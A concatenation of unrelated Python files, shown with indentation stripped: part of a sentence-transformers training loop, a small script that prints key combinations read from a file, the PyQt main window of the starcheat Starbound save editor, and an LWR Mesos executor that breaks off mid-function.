loss_model = loss_models[train_idx]
optimizer = optimizers[train_idx]
scheduler = schedulers[train_idx]
data_iterator = data_iterators[train_idx]
try:
data = next(data_iterator)
except StopIteration:
data_iterator = iter(dataloaders[train_idx])
data_iterators[train_idx] = data_iterator
data = next(data_iterator)
features, labels = data
if use_amp:
with autocast():
loss_value = loss_model(features, labels)
scale_before_step = scaler.get_scale()
scaler.scale(loss_value).backward()
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
scaler.step(optimizer)
scaler.update()
skip_scheduler = scaler.get_scale() != scale_before_step
else:
loss_value = loss_model(features, labels)
loss_value.backward()
torch.nn.utils.clip_grad_norm_(loss_model.parameters(), max_grad_norm)
optimizer.step()
running_loss += loss_value.item() * len(features)
label_count.update(labels.data.tolist())
total += len(features)
if i % print_steps == 0:
print(f"Running training loss: {running_loss/total};")
print(f"Label fraction of 1: {label_count[1]/(label_count[0] + label_count[1])};")
optimizer.zero_grad()
if not skip_scheduler:
scheduler.step()
training_steps += 1
global_step += 1
if evaluation_steps > 0 and training_steps % evaluation_steps == 0:
self._eval_during_training(evaluator, output_path, save_best_model, epoch, training_steps, callback)
for loss_model in loss_models:
loss_model.zero_grad()
loss_model.train()
if checkpoint_path is not None and checkpoint_save_steps is not None and checkpoint_save_steps > 0 and global_step % checkpoint_save_steps == 0:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
self._eval_during_training(evaluator, output_path, save_best_model, epoch, -1, callback)
if evaluator is None and output_path is not None: #No evaluator, but output path: save final model version
self.save(output_path)
if checkpoint_path is not None:
self._save_checkpoint(checkpoint_path, checkpoint_save_total_limit, global_step)
def evaluate(self, evaluator: SentenceEvaluator, output_path: str = None):
"""
Evaluate the model
:param evaluator:
the evaluator
:param output_path:
the evaluator can write the results to this path
"""
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
return evaluator(self, output_path)
def _eval_during_training(self, evaluator, output_path, save_best_model, epoch, steps, callback):
"""Runs evaluation during the training"""
eval_path = output_path
if output_path is not None:
os.makedirs(output_path, exist_ok=True)
eval_path = os.path.join(output_path, "eval")
os.makedirs(eval_path, exist_ok=True)
if evaluator is not None:
score = evaluator(self, output_path=eval_path, epoch=epoch, steps=steps)
if callback is not None:
callback(score, epoch, steps)
if score > self.best_score:
self.best_score = score
if save_best_model:
self.save(output_path)
def _save_checkpoint(self, checkpoint_path, checkpoint_save_total_limit, step):
# Store new checkpoint
self.save(os.path.join(checkpoint_path, str(step)))
# Delete old checkpoints
if checkpoint_save_total_limit is not None and checkpoint_save_total_limit > 0:
old_checkpoints = []
for subdir in os.listdir(checkpoint_path):
if subdir.isdigit():
old_checkpoints.append({'step': int(subdir), 'path': os.path.join(checkpoint_path, subdir)})
if len(old_checkpoints) > checkpoint_save_total_limit:
old_checkpoints = sorted(old_checkpoints, key=lambda x: x['step'])
shutil.rmtree(old_checkpoints[0]['path'])
def _load_auto_model(self, model_name_or_path):
"""
Creates a simple Transformer + Mean Pooling model and returns the modules
"""
logging.warning("No sentence-transformers model found with name {}. Creating a new one with MEAN pooling.".format(model_name_or_path))
transformer_model = Transformer(model_name_or_path)
pooling_model = Pooling(transformer_model.get_word_embedding_dimension(), 'mean')
return [transformer_model, pooling_model]
def _load_sbert_model(self, model_path):
"""
Loads a full sentence-transformers model
"""
# Check if the config_sentence_transformers.json file exists (exists since v2 of the framework)
config_sentence_transformers_json_path = os.path.join(model_path, 'config_sentence_transformers.json')
if os.path.exists(config_sentence_transformers_json_path):
with open(config_sentence_transformers_json_path) as fIn:
self._model_config = json.load(fIn)
if '__version__' in self._model_config and 'sentence_transformers' in self._model_config['__version__'] and self._model_config['__version__']['sentence_transformers'] > __version__:
logger.warning("You try to use a model that was created with version {}, however, your version is {}. This might cause unexpected behavior or errors. In that case, try to update to the latest version.\n\n\n".format(self._model_config['__version__']['sentence_transformers'], __version__))
# Check if a readme exists
model_card_path = os.path.join(model_path, 'README.md')
if os.path.exists(model_card_path):
try:
with open(model_card_path, encoding='utf8') as fIn:
self._model_card_text = fIn.read()
except:
pass
# Load the modules of sentence transformer
modules_json_path = os.path.join(model_path, 'modules.json')
with open(modules_json_path) as fIn:
modules_config = json.load(fIn)
modules = OrderedDict()
for module_config in modules_config:
module_class = import_from_string(module_config['type'])
module = module_class.load(os.path.join(model_path, module_config['path']))
modules[module_config['name']] = module
return modules
@staticmethod
def _get_scheduler(optimizer, scheduler: str, warmup_steps: int, t_total: int):
"""
Returns the correct learning rate scheduler. Available scheduler: constantlr, warmupconstant, warmuplinear, warmupcosine, warmupcosinewithhardrestarts
"""
scheduler = scheduler.lower()
if scheduler == 'constantlr':
return transformers.get_constant_schedule(optimizer)
elif scheduler == 'warmupconstant':
return transformers.get_constant_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps)
elif scheduler == 'warmuplinear':
return transformers.get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosine':
return transformers.get_cosine_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
elif scheduler == 'warmupcosinewithhardrestarts':
return transformers.get_cosine_with_hard_restarts_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps, num_training_steps=t_total)
else:
raise ValueError("Unknown scheduler {}".format(scheduler))
@property
def device(self) -> device:
"""
Get torch.device from module, assuming that the whole module has one device.
"""
try:
return next(self.parameters()).device
except StopIteration:
# For nn.DataParallel compatibility in PyTorch 1.5
def find_tensor_attributes(module: nn.Module) -> List[Tuple[str, Tensor]]:
tuples = [(k, v) for k, v in module.__dict__.items() if torch.is_tensor(v)]
return tuples
gen = self._named_members(get_members_fn=find_tensor_attributes)
first_tuple = next(gen)
return first_tuple[1].device
@property
def tokenizer(self):
"""
Property to get the tokenizer that is used by this model
"""
return self._first_module().tokenizer
@tokenizer.setter
def tokenizer(self, value):
"""
Property to set the tokenizer that should be used by this model
"""
self._first_module().tokenizer = value
@property
def max_seq_length(self):
"""
Property to get the maximal input sequence length for the model. Longer inputs will be truncated.
"""
return self._first_module().max_seq_length
@max_seq_length.setter
def max_seq_length(self, value):
"""
Property to set the maximal input sequence length for the model. Longer inputs will be truncated.
"""
self._first_module().max_seq_length = value
|
other.py
|
import os
import threading
import time
FILE_PATH="./data/keys.lst"
last=""
def keypress():
s=""
for k in last.split("\n"):
if (k==""):continue
s+=k.title()+" + "
print(s[:len(s)-3])
if ("enter" in last):
os.system("CLS")
while True:
with open(FILE_PATH,"r") as f:
d=f.readlines()
if ("".join(d)!=last):
last="".join(d)
thr=threading.Thread(target=keypress,args=(),kwargs={})
thr.start()
time.sleep(0)
|
mainwindow.py
|
"""
Main application window for starcheat GUI
"""
import sys
import logging
import json
from PyQt5 import QtWidgets
from PyQt5 import QtCore
from PyQt5.QtWidgets import QApplication
from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtWidgets import QTableWidgetItem
from PyQt5.QtWidgets import QFileDialog
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QAction
from PyQt5.QtWidgets import QProgressDialog
from PyQt5.QtWidgets import QColorDialog
from PyQt5.QtGui import QColor
from PyQt5.QtGui import QPixmap
from PIL.ImageQt import ImageQt
from threading import Thread
import saves
import qt_mainwindow
from assets.core import Assets
from config import Config
from gui.common import ItemWidget
from gui.common import empty_slot
from gui.openplayer import CharacterSelectDialog
from gui.utils import OptionsDialog
from gui.utils import AboutDialog
from gui.utils import ModsDialog
from gui.utils import save_modified_dialog
from gui.utils import new_setup_dialog
from gui.utils import check_index_valid
from gui.utils import update_check_worker
from gui.utils import update_check_dialog
from gui.itemedit import ItemEdit
from gui.itemedit import ImageBrowser
from gui.itemedit import import_json
from gui.itemedit import ItemEditOptions
from gui.blueprints import BlueprintLib
from gui.itembrowser import ItemBrowser
from gui.appearance import Appearance
from gui.techs import Techs
from gui.quests import Quests
from gui.ship import Ship
class StarcheatMainWindow(QMainWindow):
"""Overrides closeEvent on the main window to allow "want to save changes?" dialog"""
def __init__(self, parent):
super(QMainWindow, self).__init__()
self.parent = parent
def closeEvent(self, event):
if not self.isWindowModified():
event.accept()
return
button = save_modified_dialog(self.parent.window)
if button == QMessageBox.Save:
self.parent.save()
event.accept()
elif button == QMessageBox.Cancel:
event.ignore()
elif button == QMessageBox.Discard:
event.accept()
class MainWindow():
def __init__(self):
# check for new starcheat version online in seperate thread
update_result = [None]
update_thread = Thread(target=update_check_worker, args=[update_result], daemon=True)
update_thread.start()
"""Display the main starcheat window."""
self.app = QApplication(sys.argv)
self.window = StarcheatMainWindow(self)
self.ui = qt_mainwindow.Ui_MainWindow()
self.ui.setupUi(self.window)
logging.info("Main window init")
self.players = None
self.filename = None
self.item_browser = None
# remember the last selected item browser category
self.remember_browser = "<all>"
self.options_dialog = None
self.preview_armor = True
self.preview_bg = "#ffffff"
# connect action menu
self.ui.actionSave.triggered.connect(self.save)
self.ui.actionReload.triggered.connect(self.reload)
self.ui.actionOpen.triggered.connect(self.open_file)
self.ui.actionQuit.triggered.connect(self.app.closeAllWindows)
self.ui.actionOptions.triggered.connect(self.new_options_dialog)
self.ui.actionItemBrowser.triggered.connect(self.new_item_browser)
self.ui.actionAbout.triggered.connect(self.new_about_dialog)
self.ui.actionMods.triggered.connect(self.new_mods_dialog)
self.ui.actionImageBrowser.triggered.connect(self.new_image_browser_dialog)
self.ui.actionExportPlayerBinary.triggered.connect(self.export_save)
self.ui.actionExportPlayerJSON.triggered.connect(self.export_json)
self.ui.actionImportPlayerBinary.triggered.connect(self.import_save)
self.ui.actionImportPlayerJSON.triggered.connect(self.import_json)
# set up bag tables
bags = ("head", "chest", "legs", "back", "main_bag", "object_bag",
"tile_bag", "reagent_bag", "food_bag", "essentials", "mouse")
for bag in bags:
logging.debug("Setting up %s bag", bag)
self.bag_setup(getattr(self.ui, bag), bag)
self.preview_setup()
# signals
self.ui.blueprints_button.clicked.connect(self.new_blueprint_edit)
self.ui.appearance_button.clicked.connect(self.new_appearance_dialog)
self.ui.techs_button.clicked.connect(self.new_techs_dialog)
self.ui.quests_button.clicked.connect(self.new_quests_dialog)
self.ui.ship_button.clicked.connect(self.new_ship_dialog)
self.ui.name.textChanged.connect(self.set_name)
self.ui.male.clicked.connect(self.set_gender)
self.ui.female.clicked.connect(self.set_gender)
self.ui.pixels.valueChanged.connect(self.set_pixels)
self.ui.health.valueChanged.connect(lambda: self.set_stat_slider("health"))
self.ui.energy.valueChanged.connect(lambda: self.set_stat_slider("energy"))
self.ui.health_button.clicked.connect(lambda: self.max_stat("health"))
self.ui.energy_button.clicked.connect(lambda: self.max_stat("energy"))
self.ui.copy_uuid_button.clicked.connect(self.copy_uuid)
self.window.setWindowModified(False)
logging.debug("Showing main window")
self.window.show()
# launch first setup if we need to
if not new_setup_dialog(self.window):
logging.error("Config/index creation failed")
return
logging.info("Starbound folder: %s", Config().read("starbound_folder"))
logging.info("Checking assets hash")
if not check_index_valid(self.window):
logging.error("Index creation failed")
return
logging.info("Loading assets database")
self.assets = Assets(Config().read("assets_db"),
Config().read("starbound_folder"))
self.items = self.assets.items()
# populate species combobox
for species in self.assets.species().get_species_list():
self.ui.race.addItem(species)
self.ui.race.currentTextChanged.connect(self.update_species)
# populate game mode combobox
for mode in sorted(self.assets.player().mode_types.values()):
self.ui.game_mode.addItem(mode)
self.ui.game_mode.currentTextChanged.connect(self.set_game_mode)
# launch open file dialog
self.player = None
logging.debug("Open file dialog")
open_player = self.open_file()
# we *need* at least an initial save file
if not open_player:
logging.warning("No player file selected")
return
self.ui.name.setFocus()
# block for update check result (should be ready now)
update_thread.join()
if update_result[0]:
update_check_dialog(self.window, update_result[0])
sys.exit(self.app.exec_())
def update(self):
"""Update all GUI widgets with values from PlayerSave instance."""
logging.info("Updating main window")
# uuid / save version
self.ui.uuid_label.setText(self.player.get_uuid())
self.ui.ver_label.setText(self.player.get_header())
# name
self.ui.name.setText(self.player.get_name())
# race
self.ui.race.setCurrentText(self.player.get_race(pretty=True))
# pixels
try:
self.ui.pixels.setValue(self.player.get_pixels())
except TypeError:
logging.exception("Unable to set pixels widget")
# gender
getattr(self.ui, self.player.get_gender()).toggle()
# game mode
game_mode = self.player.get_game_mode()
try:
self.ui.game_mode.setCurrentText(self.assets.player().mode_types[game_mode])
except KeyError:
logging.exception("No game mode set on player")
# stats
self.update_stat("health")
self.update_stat("energy")
# quests
# TODO: re-enable when quests are supported again
# can_edit_quests = "quests" in self.player.entity
can_edit_quests = False
self.ui.quests_button.setEnabled(can_edit_quests)
# TODO: re-enable when techs work
self.ui.techs_button.setEnabled(False)
# ship
can_edit_ship = ("shipUpgrades" in self.player.entity and
"aiState" in self.player.entity)
self.ui.ship_button.setEnabled(can_edit_ship)
# items
total = 0
progress = QProgressDialog("Updating item slots...",
None, 0, 11, self.window)
progress.setWindowTitle("Updating...")
progress.setWindowModality(QtCore.Qt.ApplicationModal)
progress.forceShow()
progress.setValue(total)
# equipment
equip_bags = "head", "chest", "legs", "back"
for bag in equip_bags:
logging.debug("Updating %s", bag)
items = []
for x in getattr(self.player, "get_" + bag)():
if x is not None:
items.append(ItemWidget(x["content"], self.assets))
else:
items.append(ItemWidget(None, self.assets))
getattr(self.ui, bag).setItem(0, 0, items[0])
getattr(self.ui, bag).setItem(0, 1, items[1])
total += 1
progress.setValue(total)
for bag in "main_bag", "tile_bag", "object_bag", "reagent_bag", "food_bag", "essentials", "mouse":
self.update_bag(bag)
total += 1
progress.setValue(total)
self.update_player_preview()
def bag_setup(self, widget, name):
widget.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
# TODO: still issues with drag drop between tables
widget.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
widget.cellChanged.connect(self.set_edited)
item_edit = getattr(self, "new_" + name + "_item_edit")
widget.cellDoubleClicked.connect(lambda: item_edit(False))
sortable = ("main_bag", "tile_bag", "object_bag", "reagent_bag", "food_bag")
clearable = ("essentials")
edit_action = QAction("Edit...", widget)
edit_action.triggered.connect(lambda: item_edit(False))
widget.addAction(edit_action)
edit_json_action = QAction("Edit JSON...", widget)
edit_json_action.triggered.connect(lambda: item_edit(False, True))
widget.addAction(edit_json_action)
import_json = QAction("Import...", widget)
import_json.triggered.connect(lambda: item_edit(True))
widget.addAction(import_json)
trash_action = QAction("Trash", widget)
trash_slot = lambda: self.trash_slot(self.window, widget, True)
trash_action.triggered.connect(trash_slot)
widget.addAction(trash_action)
if name in sortable or name in clearable:
sep_action = QAction(widget)
sep_action.setSeparator(True)
widget.addAction(sep_action)
if name in clearable:
clear_action = QAction("Clear Held Items", widget)
clear_action.triggered.connect(self.clear_held_slots)
widget.addAction(clear_action)
if name in sortable:
sort_name = QAction("Sort By Name", widget)
sort_name.triggered.connect(lambda: self.sort_bag(name, "name"))
widget.addAction(sort_name)
sort_type = QAction("Sort By Type", widget)
sort_type.triggered.connect(lambda: self.sort_bag(name, "category"))
widget.addAction(sort_type)
sort_count = QAction("Sort By Count", widget)
sort_count.triggered.connect(lambda: self.sort_bag(name, "count"))
widget.addAction(sort_count)
def toggle_preview_armor(self):
self.preview_armor = not self.preview_armor
self.update_player_preview()
def change_preview_background(self):
qcolor = QColorDialog().getColor(QColor(self.preview_bg),
self.window)
if qcolor.isValid():
self.preview_bg = qcolor.name()
self.update_player_preview()
def preview_setup(self):
button = self.ui.preview_config_button
toggle_armor = QAction("Toggle Armor", button)
toggle_armor.triggered.connect(self.toggle_preview_armor)
button.addAction(toggle_armor)
change_bg = QAction("Change Background...", button)
change_bg.triggered.connect(self.change_preview_background)
button.addAction(change_bg)
def update_title(self):
"""Update window title with player name."""
self.window.setWindowTitle("Starcheat - " + self.player.get_name() + "[*]")
def save(self):
"""Update internal player dict with GUI values and export to file."""
logging.info("Saving player file %s", self.player.filename)
self.set_bags()
# save and show status
logging.info("Writing file to disk")
self.player.export_save(self.player.filename)
self.update_title()
self.ui.statusbar.showMessage("Saved " + self.player.filename, 3000)
self.window.setWindowModified(False)
self.players[self.player.get_uuid()] = self.player
def new_item_edit(self, bag, do_import, json_edit=False):
"""Display a new item edit dialog using the select cell in a given bag."""
logging.debug("New item edit dialog")
row = bag.currentRow()
column = bag.currentColumn()
current = bag.currentItem()
item = saves.empty_slot()
valid_slot = (type(current) is not QTableWidgetItem and
current is not None and
current.item is not None)
if do_import:
imported = import_json(self.window)
if imported is False:
self.ui.statusbar.showMessage("Error importing item, see starcheat log for details", 3000)
return
elif imported is None:
return
else:
item = imported
# cells don't retain ItemSlot widget when they've been dragged away
if valid_slot:
item.update(current.item)
if not json_edit:
item_edit = ItemEdit(self.window, item,
self.player, self.assets,
self.remember_browser)
else:
item_edit = ItemEditOptions(self.window,
item["name"],
item,
"Edit Item Data")
def update_slot():
logging.debug("Writing changes to slot")
try:
if not json_edit:
data = item_edit.get_item()
else:
name, data = item_edit.get_option()
new_slot = ItemWidget(data, self.assets)
if new_slot.item["name"] != "":
bag.setItem(row, column, new_slot)
if not json_edit:
self.remember_browser = item_edit.remember_browser
self.set_bags()
self.update_player_preview()
self.set_edited()
except (TypeError, KeyError):
logging.exception("Error updating item slot")
self.ui.statusbar.showMessage("Error updating item slot, see starcheat log for details", 3000)
item_edit.dialog.accepted.connect(update_slot)
if not json_edit:
trash_slot = lambda: self.trash_slot(item_edit.dialog, bag)
item_edit.ui.trash_button.clicked.connect(trash_slot)
got_item = item_edit.launch()
if got_item:
item_edit.dialog.exec()
else:
item_edit.dialog.exec()
def trash_slot(self, dialog, bag, standalone=False):
row = bag.currentRow()
column = bag.currentColumn()
ask_dialog = QMessageBox(dialog)
ask_dialog.setWindowTitle("Trash Item")
ask_dialog.setText("Are you sure?")
ask_dialog.setStandardButtons(QMessageBox.Yes | QMessageBox.No)
ask_dialog.setDefaultButton(QMessageBox.No)
ask_dialog.setIcon(QMessageBox.Question)
if ask_dialog.exec() == QMessageBox.Yes:
bag.setItem(row, column, empty_slot())
if not standalone:
dialog.close()
self.set_bags()
self.update_player_preview()
self.set_edited()
def set_edited(self):
self.window.setWindowModified(True)
def sort_bag(self, bag_name, sort_by):
self.set_bags()
bag = getattr(self.player, "get_" + bag_name)()
sorted_bag = self.assets.player().sort_bag(bag, sort_by)
getattr(self.player, "set_" + bag_name)(sorted_bag)
self.ui.statusbar.showMessage("Sorting by " + sort_by + "...", 3000)
self.update()
self.ui.statusbar.clearMessage()
def clear_held_slots(self):
self.player.clear_held_slots()
self.set_edited()
self.ui.statusbar.showMessage("All held items have been cleared", 3000)
def new_blueprint_edit(self):
"""Launch a new blueprint management dialog."""
logging.debug("New blueprint dialog")
blueprint_lib = BlueprintLib(self.window,
self.player.get_blueprints(),
self.player.get_new_blueprints())
def update_blueprints():
logging.debug("Writing blueprints")
self.player.set_blueprints(blueprint_lib.get_known_list())
self.player.set_new_blueprints(blueprint_lib.new_blueprints)
blueprint_lib.dialog.close()
self.set_edited()
blueprint_lib.ui.buttonBox.rejected.connect(update_blueprints)
blueprint_lib.dialog.exec()
def copy_uuid(self):
clipboard = self.app.clipboard()
clipboard.setText(self.player.get_uuid())
self.ui.statusbar.showMessage("UUID copied to clipboard", 3000)
def new_item_browser(self):
"""Launch a standalone item browser dialog that does write any changes."""
self.item_browser = ItemBrowser(self.window, True)
self.item_browser.dialog.show()
def new_options_dialog(self):
"""Launch a new options config dialog."""
logging.debug("New options dialog")
self.options_dialog = OptionsDialog(self.window)
def write_options():
logging.info("Writing options to disk")
self.options_dialog.write()
self.update()
self.options_dialog.dialog.rejected.connect(write_options)
self.options_dialog.dialog.exec()
def new_about_dialog(self):
"""Launch a new about dialog."""
about_dialog = AboutDialog(self.window)
about_dialog.dialog.exec()
def new_appearance_dialog(self):
appearance_dialog = Appearance(self)
appearance_dialog.dialog.exec()
appearance_dialog.write_appearance_values()
self.update_player_preview()
def new_techs_dialog(self):
techs_dialog = Techs(self)
techs_dialog.dialog.rejected.connect(techs_dialog.write_techs)
techs_dialog.dialog.exec()
def new_quests_dialog(self):
quests_dialog = Quests(self)
quests_dialog.dialog.rejected.connect(quests_dialog.write_quests)
quests_dialog.dialog.exec()
def new_ship_dialog(self):
ship_dialog = Ship(self)
ship_dialog.dialog.rejected.connect(ship_dialog.write_ship)
ship_dialog.dialog.exec()
def new_mods_dialog(self):
mods_dialog = ModsDialog(self.window)
mods_dialog.dialog.exec()
def new_image_browser_dialog(self):
self.image_browser = ImageBrowser(self.window, self.assets)
self.image_browser.dialog.show()
def reload(self):
"""Reload the currently open save file and update GUI values."""
logging.info("Reloading file %s", self.player.filename)
self.player = saves.PlayerSave(self.player.filename)
self.update()
self.update_title()
self.ui.statusbar.showMessage("Reloaded " + self.player.filename, 3000)
self.window.setWindowModified(False)
def open_file(self):
"""Display open file dialog and load selected save."""
if self.window.isWindowModified():
button = save_modified_dialog(self.window)
if button == QMessageBox.Cancel:
return False
elif button == QMessageBox.Save:
self.save()
character_select = CharacterSelectDialog(self, self.assets)
character_select.show()
self.players = character_select.players
if character_select.selected is None:
logging.warning("No player selected")
return False
else:
self.player = character_select.selected
self.update()
self.update_title()
self.ui.statusbar.showMessage("Opened " + self.player.filename, 3000)
self.window.setWindowModified(False)
return True
# export save stuff
def export_save(self, kind="player"):
"""Save a copy of the current player file to another location.
Doesn't change the current filename."""
export_func = lambda: self.player.export_save(filename[0])
title = "Export Player File As"
filetype = "Player (*.player);;All Files (*)"
status = "Exported player file to "
filename = QFileDialog.getSaveFileName(self.window, title, filter=filetype)
if filename[0] != "":
self.set_bags()
export_func()
self.ui.statusbar.showMessage(status + filename[0], 3000)
def export_json(self, kind="player"):
"""Export player entity as json."""
data = self.player.entity
title = "Export Player JSON File As"
filetype = "JSON (*.json);;All Files (*)"
status = "Exported player JSON file to "
filename = QFileDialog.getSaveFileName(self.window, title, filter=filetype)
if filename[0] != "":
self.set_bags()
json_data = json.dumps(data, sort_keys=True,
indent=4, separators=(',', ': '))
json_file = open(filename[0], "w")
json_file.write(json_data)
json_file.close()
self.ui.statusbar.showMessage(status + filename[0], 3000)
# import save stuff
def import_save(self, kind="player"):
"""Import a .player file over the top of current player."""
import_func = self.player.import_save
title = "Import Player File"
filetype = "Player (*.player);;All Files (*)"
status = "Imported player file from "
filename = QFileDialog.getOpenFileName(self.window, title, filter=filetype)
if filename[0] == "":
return
try:
import_func(filename[0])
self.update()
self.ui.statusbar.showMessage(status + filename[0], 3000)
except:
logging.exception("Error reading file: %s", filename[0])
self.ui.statusbar.showMessage("Error reading file, see starcheat log for details", 3000)
def import_json(self, kind="player"):
"""Import an exported JSON file and merge/update with open player."""
update_func = lambda: self.player.entity.update(data)
title = "Import JSON Player File"
status = "Imported player file "
filename = QFileDialog.getOpenFileName(self.window, title,
filter="JSON (*.json);;All Files (*)")
if filename[0] == "":
logging.debug("No file selected to import")
return
try:
data = json.load(open(filename[0], "r"))
update_func()
self.update()
self.ui.statusbar.showMessage(status + filename[0], 3000)
except:
logging.exception("Error reading file: %s", filename[0])
self.ui.statusbar.showMessage("Error importing file, see starcheat log for details", 3000)
def get_gender(self):
if self.ui.male.isChecked():
return "male"
else:
return "female"
def get_bag(self, name):
"""Return the entire contents of a given non-equipment bag as raw values."""
logging.debug("Getting %s contents", name)
row = column = 0
bag = getattr(self.player, "get_" + name)()
for i in range(len(bag)):
item = getattr(self.ui, name).item(row, column)
empty_item = (item is None or
type(item) is QTableWidgetItem or
item.item is None)
if empty_item:
item = None
else:
widget = item.item
item = saves.new_item(widget["name"],
widget["count"],
widget["parameters"])
try:
bag[i] = item
except TypeError:
baglist = list(bag)
baglist[i] = item
del bag
bag = baglist
# so far all non-equip bags are 10 cols long
column += 1
if (column % 10) == 0:
row += 1
column = 0
return bag
def get_equip(self, name):
"""Return the raw values of both slots in a given equipment bag."""
logging.debug("Getting %s contents", name)
equip = getattr(self.ui, name)
main_cell = equip.item(0, 0)
glamor_cell = equip.item(0, 1)
# when you drag itemwidgets around the cell will become empty so just
# pretend it had an empty slot value
empty_main = (main_cell is None or
type(main_cell) is QTableWidgetItem or
main_cell.item is None)
if empty_main:
main = None
else:
widget = main_cell.item
main = saves.new_item(widget["name"],
widget["count"],
widget["parameters"])
empty_glamor = (glamor_cell is None or
type(glamor_cell) is QTableWidgetItem or
glamor_cell.item is None)
if empty_glamor:
glamor = None
else:
widget = glamor_cell.item
glamor = saves.new_item(widget["name"],
widget["count"],
widget["parameters"])
return main, glamor
def update_bag(self, bag_name):
"""Set the entire contents of any given bag with ItemWidgets based off player data."""
logging.debug("Updating %s contents", bag_name)
row = column = 0
bag = getattr(self.player, "get_" + bag_name)()
for slot in range(len(bag)):
item = bag[slot]
if item is not None and "content" in item:
widget = ItemWidget(item["content"], self.assets)
else:
widget = ItemWidget(None, self.assets)
getattr(self.ui, bag_name).setItem(row, column, widget)
column += 1
if (column % 10) == 0:
row += 1
column = 0
def update_player_preview(self):
try:
image = self.assets.species().render_player(self.player,
self.preview_armor)
pixmap = QPixmap.fromImage(ImageQt(image))
except (OSError, TypeError, AttributeError):
# TODO: more specific error handling. may as well except all errors
# at this point jeez
logging.exception("Couldn't load species images")
pixmap = QPixmap()
self.ui.player_preview.setStyleSheet("background-color: %s;" % self.preview_bg)
self.ui.player_preview.setPixmap(pixmap)
self.window.setWindowModified(True)
def update_species(self):
species = self.ui.race.currentText()
if self.player.get_race(pretty=True) == species:
# don't overwrite appearance values if it didn't really change
return
self.player.set_race(species)
defaults = self.assets.species().get_default_colors(species)
for key in defaults:
getattr(self.player, "set_%s_directives" % key)(defaults[key][0])
self.update_player_preview()
self.window.setWindowModified(True)
def set_pixels(self):
self.player.set_pixels(self.ui.pixels.value())
self.set_edited()
def set_name(self):
self.player.set_name(self.ui.name.text())
self.set_edited()
def set_gender(self):
self.player.set_gender(self.get_gender())
self.update_player_preview()
self.set_edited()
def set_game_mode(self):
self.player.set_game_mode(self.assets.player().get_mode_type(self.ui.game_mode.currentText()))
self.set_edited()
def set_bags(self):
# this function mostly just exist to work around the bug of
# dragndrop not updating player entity. this requires the table view
# equipment
equip_bags = "head", "chest", "legs", "back"
for b in equip_bags:
bag = self.get_equip(b)
getattr(self.player, "set_" + b)(bag[0], bag[1])
# bags
bags = "main_bag", "tile_bag", "essentials", "mouse", "object_bag", "reagent_bag", "food_bag"
for b in bags:
getattr(self.player, "set_" + b)(self.get_bag(b))
def max_stat(self, name):
"""Set a stat's current value to its max value."""
getattr(self.player, "set_"+name)(100)
self.update_stat(name)
def set_stat(self, name):
max = getattr(self.ui, "max_"+name).value()
getattr(self.player, "set_max_"+name)(float(max))
self.update_stat(name)
def set_stat_slider(self, name):
current = getattr(self.ui, name).value()
getattr(self.player, "set_"+name)(current)
self.update_stat(name)
def update_stat(self, name):
try:
current = int(getattr(self.player, "get_"+name)())
button = getattr(self.ui, name+"_button")
getattr(self.ui, name).setValue(current)
button.setEnabled(current != 100)
self.set_edited()
except TypeError:
logging.exception("Unable to set stat %s", name)
# these are used for connecting the item edit dialog to bag tables
def new_main_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.main_bag, do_import, json_edit)
def new_tile_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.tile_bag, do_import, json_edit)
def new_object_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.object_bag, do_import, json_edit)
def new_reagent_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.reagent_bag, do_import, json_edit)
def new_food_bag_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.food_bag, do_import, json_edit)
def new_head_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.head, do_import, json_edit)
def new_chest_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.chest, do_import, json_edit)
def new_legs_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.legs, do_import, json_edit)
def new_back_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.back, do_import, json_edit)
def new_essentials_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.essentials, do_import, json_edit)
def new_mouse_item_edit(self, do_import, json_edit=False):
self.new_item_edit(self.ui.mouse, do_import, json_edit)
|
mesos_executor.py
|
import sys
import threading
from lwr.mesos import (
Executor,
MesosExecutorDriver,
mesos_pb2,
ensure_mesos_libs,
)
from lwr.lwr_client.util import from_base64_json
from lwr.scripts.lwr_submit import (
manager_from_args,
wait_for_job
)
from lwr.manager_endpoint_util import submit_job
from lwr.daemon import (
ArgumentParser,
LwrManagerConfigBuilder,
)
import logging
log = logging.getLogger(__name__)
DESCRIPTION = "Mesos executor for the LWR"
class LwrExecutor(Executor):
def __task_update(self, driver, task, state, data=None):
try:
log.debug("Sending status update...")
update = mesos_pb2.TaskStatus()
update.task_id.value = task.task_id.value
update.state = state
if data:
update.data = data
driver.sendStatusUpdate(update)
except Exception:
log.exception("Failed to update status of task.")
def launchTask(self, driver, task):
# Create a thread to run the task. Tasks should always be run in new
# threads or processes, rather than inside launchTask itself.
def run_task():
try:
log.info("Running task %s" % task.task_id.value)
task_data = from_base64_json(task.data)
manager_options = task_data["manager"]
config_builder = LwrManagerConfigBuilder(**manager_options)
manager, lwr_app = manager_from_args(config_builder)
job_config = task_data["job"]
submit_job(manager, job_config)
self.__task_update(driver, task, mesos_pb2.TASK_RUNNING)
wait_for_job(manager, job_config)
self.__task_update(driver, task, mesos_pb2.TASK_FINISHED)
lwr_app.shutdown()
except Exception:
log.exception("Failed to run, update, or monitor task %s" % task)
raise
thread = threading.Thread(target=run_task)
thread.start()
def frameworkMessage(self, driver, message):
# Send it back to the scheduler.
driver.sendFrameworkMessage(message)
def run_executor():
